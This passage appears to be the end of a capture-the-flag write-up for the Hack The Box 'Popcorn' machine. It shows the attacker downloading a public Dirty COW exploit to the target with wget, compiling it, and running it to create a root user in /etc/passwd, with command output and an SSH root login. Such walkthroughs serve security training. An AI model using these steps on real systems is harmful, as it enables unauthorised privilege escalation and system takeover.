--------------------------------------------------------- ----------------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge | exploits/linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge | exploits/linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/s | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' R | exploits/linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem R | exploits/linux/local/40611.c
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Popcorn/www$ searchsploit -m 40839
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40839
Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Popcorn/www/40839.c
From the target machine
www-data@popcorn:/tmp$ wget http://10.10.14.28/40839.c --2020-03-10 12:24:17-- http://10.10.14.28/40839.c Connecting to 10.10.14.28:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5006 (4.9K) [text/plain] Saving to: `40839.c'
100%[======================================>] 5,006 --.-K/s in 0s
2020-03-10 12:24:17 (438 MB/s) - `40839.c' saved [5006/5006] www-data@popcorn:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt www-data@popcorn:/tmp$ ./dirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: hello
Complete line: firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash
mmap: b77e3000
The process does't finish, but after a few seconds we try to login by ssh.
u505@kali:~/HTB/Machines/Popcorn/www$ ssh firefart@popcorn.htb The authenticity of host 'popcorn.htb (10.10.10.6)' can't be established. RSA key fingerprint is SHA256:V1Azfw43WixBJWVAsqnBuoCdUrthzn2x6VQiZjAUusk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'popcorn.htb,10.10.10.6' (RSA) to the list of known hosts. firefart@popcorn.htb's password: Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686
To access official Ubuntu documentation, please visit: http://help.ubuntu.com/
System information as of Tue Mar 10 12:26:21 EET 2020
System load: 2.29 Memory usage: 6% Processes: 119 Usage of /: 6.2% of 14.80GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Sun Sep 24 18:01:48 2017 firefart@popcorn:~# id uid=0(firefart) gid=0(root) groups=0(root) firefart@popcorn:~# ps -ef | grep dirt www-data 1445 1421 12 12:25 pts/1 00:00:38 ./dirty www-data 1446 1445 12 12:25 pts/1 00:00:36 ./dirty firefart 1514 1498 0 12:30 pts/2 00:00:00 grep dirt firefart@popcorn:~# kill 1445
We kill the race condition.
mmap: b77e3000 Terminated madvise 0
Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password 'hello'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Root Flag
root@popcorn:/tmp# cat /root/root.txt <ROOT_FLAG>
References
- https://nvd.nist.gov/vuln/detail/CVE-2010-0832
- https://www.exploit-db.com/exploits/15704
- https://nvd.nist.gov/vuln/detail/CVE-2010-3904
- https://nvd.nist.gov/vuln/detail/CVE-2016-5195
Daniel Simao 18:22, 9 March 2020 (EDT)
